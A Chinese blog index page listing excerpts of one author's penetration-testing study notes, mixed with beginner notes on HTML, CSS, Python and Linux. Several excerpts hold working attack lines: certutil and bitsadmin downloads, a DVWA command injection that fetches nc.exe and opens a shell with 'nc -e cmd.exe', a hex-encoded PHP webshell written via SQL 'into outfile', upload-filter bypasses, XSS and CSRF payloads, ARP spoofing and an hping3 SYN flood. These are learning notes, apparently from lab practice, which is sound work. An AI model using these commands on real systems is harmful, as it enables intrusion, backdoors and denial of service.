摘要:
proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端 不要直接运行D
阅读全文
posted @ 2022-04-17 15:05
邓阮叶
阅读(60)
推荐(0)
摘要:
首先下载插件包 all-2.0.tar.gz 放入 /opt/nessus/sbin 下,执行 ./nessuscli update all-2.0.tar.gz 如果更新后licence失效则需修改配置文件 /opt/nessus/lib/nessus/plugins 和 /opt/nessus/
阅读全文
posted @ 2022-04-16 11:59
邓阮叶
阅读(1576)
推荐(0)
摘要:
例如访问网站域名对应目录为 D:\www\cms\ 访问网站IP对应目录为 D:\www\ 此时若有一文件地址为 D:\www\cms.zip 则必须扫IP才能扫到
阅读全文
posted @ 2022-04-16 09:54
邓阮叶
阅读(103)
推荐(0)
摘要:
在mysql5.0以上版本中,存在一个数据库information_schema,记录了所有的数据库名,表名,列名 数据库中符号‘.’代表下一级,如information_schema.tables,information_schema.columns 数据库可获取的信息 数据库版本:version
阅读全文
posted @ 2022-03-06 20:02
邓阮叶
阅读(268)
推荐(0)
摘要:
asp+access php+mysql aspx+mssql jsp+mssql,Oracle python+mangodb,mysql access和mssql是微软的产品,常用于windows
阅读全文
posted @ 2022-03-04 15:47
邓阮叶
阅读(224)
推荐(0)
摘要:
通过修改网站url大小写来测试 linux大小写敏感,windows大小写不敏感 或 使用nmap判断 nmap -O IP
阅读全文
posted @ 2022-03-04 15:31
邓阮叶
阅读(267)
推荐(0)
摘要:
判断存在可通过多地ping,若得到ip不同则存在cdn 寻找真实ip最有效方法则是ping二级域名,或通过国外ip进行ping 大部分网站会在www的主站设置CDN(例www.xueersi.com),但不会在主域名设置CDN(例xueersi.com) 通过第三方接口查询 https://get-
阅读全文
posted @ 2022-03-03 14:49
邓阮叶
阅读(607)
推荐(0)
摘要:
前端content-typephp3,phtml.htaccess SetHandler application/x-httpd-php大小写后缀名中加空格 "php "windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”利用windows特性,可在后缀名中加” ::$DATA”
阅读全文
posted @ 2020-06-17 09:43
邓阮叶
阅读(373)
推荐(0)
摘要:
反序列化sql注入ssrfxxe任意文件下载任意文件包含文件上传弱口令:vpn,邮箱,oa,后台
阅读全文
posted @ 2020-05-07 15:42
邓阮叶
阅读(200)
推荐(0)
摘要:
sniper custom iterator position:3 payload processing:选择加密 payload encoding:取消√
阅读全文
posted @ 2020-04-26 11:54
邓阮叶
阅读(507)
推荐(0)
摘要:
使用 window.alert() 弹出警告框 使用 document.write() 方法将内容写到 HTML 文档中 使用 innerHTML 写入到 HTML 元素 使用 console.log() 写入到浏览器的控制台 console.log(5+6); 从 JavaScript 访问某个
阅读全文
posted @ 2020-04-23 20:32
邓阮叶
阅读(164)
推荐(0)
摘要:
CSS 指层叠样式表 (Cascading Style Sheets) CSS 规则由两个主要的部分构成:选择器,以及一条或多条声明。 h1 {color:red; font-size:14px;} h1为选择器,color:red为声明,color为属性,red为值,多个声明用分号;隔开 派生选择
阅读全文
posted @ 2020-04-23 16:57
邓阮叶
阅读(191)
推荐(0)
摘要:
html标题 <h1>This is a heading</h1> 标题分为h1-6 html头部 <head>This is a header</head> html段落 <p>This is a paragraph.</p> html链接 <a href="http://www.w3school
阅读全文
posted @ 2020-04-22 22:54
邓阮叶
阅读(283)
推荐(0)
摘要:
filetype:doc 限定搜索文件格式 site:(mi.com) 限定搜索站点 intitle:(登录) 限定网页标题 inurl:(admin.php) 限定网页链接 "admin" 包含完整的关键词 inurl:(admin.php | managment.php) |或,搜索多个关键词
阅读全文
posted @ 2020-04-14 19:07
邓阮叶
阅读(1219)
推荐(1)
摘要:
0x01域名收集 获得域名后,首先检查有没有域传送,接着用搜索引擎或oneforall,JSFinder等工具获得二级域名,子域名,ip等信息 oneforall python3 oneforall.py --target 192.168.1.1 --port=large --format=xls
阅读全文
posted @ 2020-04-13 22:10
邓阮叶
阅读(438)
推荐(0)
摘要:
certutil.exe -urlcache -split -f http://175.24.87.169/456.zip 123.aspx bitsadmin /transfer 任务名 http://files.cnblogs.com/files/gayhub/bcn.js c:\bcn.bat
阅读全文
posted @ 2020-04-13 19:44
邓阮叶
阅读(2283)
推荐(0)
摘要:
antData 存放个人编写的文件,插件,payload等 modules 后端配置模块,用于进行一些通用的变量如初始化目录等设置 node_modules 用于放用包管理工具下载安装了的包 source 源代码 source\core 各种不同加密方式下的payload static 静态文件夹
阅读全文
posted @ 2020-04-12 16:12
邓阮叶
阅读(595)
推荐(0)
摘要:
原文地址:https://xz.aliyun.com/t/5152?spm=5176.12901015.0.i12901015.3268525cyJqgGL eval函数中参数是字符 eval('echo 1;'); assert函数中参数为表达式 (或者为函数)assert(phpinfo());
阅读全文
posted @ 2020-04-12 10:14
邓阮叶
阅读(971)
推荐(0)
摘要:
1、关闭IE ESC。 服务器管理器—安全信息,找到“配置IE ESC”,管理员和用户都选择“禁用”。 2、添加功能 添加.NET FrameWork 3.5.1、Windows PowerShell、无线Lan服务、优质Windows音频视频体验、桌面体验。 3、开启服务,开始—运行,输入serv
阅读全文
posted @ 2020-04-06 02:07
邓阮叶
阅读(487)
推荐(0)
摘要:
输入输出 1 cout << "请输入" << endl; 2 int x = 0; (初始化变量) 3 cin >> x; 4 cout << x << endl; 命名空间 1 namespace A 2 { 3 int x = 2; 4 void f1(); 5 } 6 cout << A::
阅读全文
posted @ 2020-03-22 14:47
邓阮叶
阅读(185)
推荐(0)
摘要:
1. 一、配置SSH参数 修改sshd_config文件,命令为: vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes 2. 将PermitRootLogin without-passw
阅读全文
posted @ 2020-03-18 23:07
邓阮叶
阅读(299)
推荐(0)
摘要:
列表list 1 name = ['一','二','三','四','五'] 2 print(name[2]) 3 print(name[0:2])#(左闭右开) 4 name[1] = '2' 5 name.append('六') 6 del name[3] 元组tuple 1 tuple1 = (
阅读全文
posted @ 2020-03-17 20:36
邓阮叶
阅读(182)
推荐(0)
摘要:
java区分大小写 标识符可以由字母、数字、下划线(_)、美元符($)组成,但不能包含 @、%、空格等其它特殊字符,不能以数字开头 变量名由多单词组成时,第一个单词的首字母小写,其后单词的首字母大写 String stuName = lucy; java强制类型转换 1 double age1 =
阅读全文
posted @ 2020-03-16 15:49
邓阮叶
阅读(156)
推荐(0)
摘要:
netstat -ano | findstr 443 tasklist | findstr 6084
阅读全文
posted @ 2020-03-15 16:49
邓阮叶
阅读(96)
推荐(0)
摘要:
serialize($test)序列化 unserialize($test2)反序列化 payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>" XXE(XML External Entity Injection) 全称为
阅读全文
posted @ 2020-02-02 16:12
邓阮叶
阅读(318)
推荐(0)
摘要:
1、 登陆网站,并打开文件上传页面 2、 点击“浏览”按钮,并选择本地的一个JSP文件(比如hacker.jsp),确认上传。 3、 如果客户端脚本限制了上传文件的类型(比如允许gif文件),则把hacker.jsp更名为hacker.gif;配置HTTP Proxy(burp)进行http请求拦截
阅读全文
posted @ 2020-02-02 15:12
邓阮叶
阅读(166)
推荐(0)
摘要:
反射型xss分为get与post两种,都需要网络交互 get型可直接通过链接利用 post型可通过构造表单访问 dom型xss不需要联网,只在前端进行 xss之过滤 可尝试大小写,拼凑绕过 xss之htmlspecialchars 'onclick='alert(123)' xss之href输出 j
阅读全文
posted @ 2019-10-27 12:05
邓阮叶
阅读(230)
推荐(0)
摘要:
attack type选择pitchfork payload type选择recursive grep option中选择grep-extract 线程threads需要改成1
阅读全文
posted @ 2019-10-27 09:58
邓阮叶
阅读(370)
推荐(0)
摘要:
!!!php需要用fastcgi/cgi,以fastcgi运行的php都可以用这个方法 创建文件 .user.ini 文件中写 auto_prepend_file=1.jpg 其中1.jpg为要包含的文件 此时访问任意php文件均会包含1.jpg文件中的内容 https://wooyun.js.or
阅读全文
posted @ 2019-10-26 16:33
邓阮叶
阅读(176)
推荐(0)
摘要:
select 0x3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e into outfile '//var//www//html//mixcall//h.php' select 0x十六进制菜刀 into outfile '路径
阅读全文
posted @ 2019-10-26 15:19
邓阮叶
阅读(227)
推荐(0)
摘要:
在网站输入一个错误文件访问获得绝对路径http://183.63.176.19:8090/admin.php 用Navicat连接数据库 用em编辑器打开G:\Behinder\server\shell.php,并转化格式为合并行,复制内容到火狐浏览器进行编码为十六进制,然后复制内容 连接后在查询模
阅读全文
posted @ 2019-09-07 18:30
邓阮叶
阅读(189)
推荐(0)
摘要:
1 <style> 2 form{ 3 display:none; 4 } 5 </style> 6 <form action="http://192.168.1.120/vulnerabilities/csrf/" method="GET"> 7 New password:<br /> 8 <in
阅读全文
posted @ 2019-08-16 18:17
邓阮叶
阅读(108)
推荐(0)
摘要:
192.168.1.120|certutil.exe -urlcache -split -f http://192.168.1.168/nc.exe C:\phpStudy\nc.exe 192.168.1.120|C:\phpStudy\nc.exe -e cmd.exe 192.168.1.16
阅读全文
posted @ 2019-08-16 18:13
邓阮叶
阅读(498)
推荐(0)
摘要:
SQL注入 low 127.0.0.1 | whoami medium 127.0.0.1| whoami#由于源码中会过滤‘ |’,所以将空格去掉即可 文件包含 low 本地payload http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../.
阅读全文
posted @ 2019-08-16 17:55
邓阮叶
阅读(393)
推荐(0)
摘要:
SQLmap -u 检测sql注入点 -u --dbs -u -D --tables -u -D -T --columns -u -D -T -C --dump -r 文件.txt#用burp抓包复制到txt文件中,在有sql注入的地方加*星号 --sql-shell#可用语言直接查询数据库sqlm
阅读全文
posted @ 2019-08-12 17:25
邓阮叶
阅读(158)
推荐(0)
摘要:
vim /test/vi.test Vim 查找文本 /abc 向前查找abc /^abc 查找以 abc 为行首的行 /abc$ 查找以 abc 为行尾的行 ?abc 向后查找abc Vim 替换文本 r 替换字符 R 替换字符,输入内容会覆盖掉后面的内容,按“Esc”结束 :s/a1/a2/g
阅读全文
posted @ 2019-08-08 19:44
邓阮叶
阅读(135)
推荐(0)
摘要:
cd ls -a 列出所有文件,包括隐藏文件和. .. -l(L) 列出详细信息 mkdir -p test/test1/test2 递归创建目录 rmdir -p test/test1/test2 递归删除空目录 touch -a 只修改文件的访问时间 -c 仅修改文件的时间参数(3 个时间参数都
阅读全文
posted @ 2019-08-08 17:50
邓阮叶
阅读(154)
推荐(0)
摘要:
头部hex: 89 50 4E 47 0D 0A 1A 0A ‰PNG头 结尾hex:00 00 00 00 49 45 4E 44 AE 42 60 82 ....IEND?B`?
阅读全文
posted @ 2019-08-03 16:15
邓阮叶
阅读(994)
推荐(0)
摘要:
pyhton目录下的lib\mimetypes.py 在import后加这段代码 if sys.getdefaultencoding() != 'gbk': reload(sys) sys.setdefaultencoding('gbk') # 对准格式 pip报错运行以下代码重装pip pytho
阅读全文
posted @ 2019-08-01 18:35
邓阮叶
阅读(734)
推荐(0)
摘要:
ARP欺骗:arpspoof -i eth0 -t 192.168.185 192.168.1.1 嗅探工具:ettercap -Tq -i eth0 SYN Flood攻击(ddos分布式拒绝服务攻击):hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445
阅读全文
posted @ 2019-07-27 11:48
邓阮叶
阅读(1056)
推荐(0)
浙公网安备 33010602011771号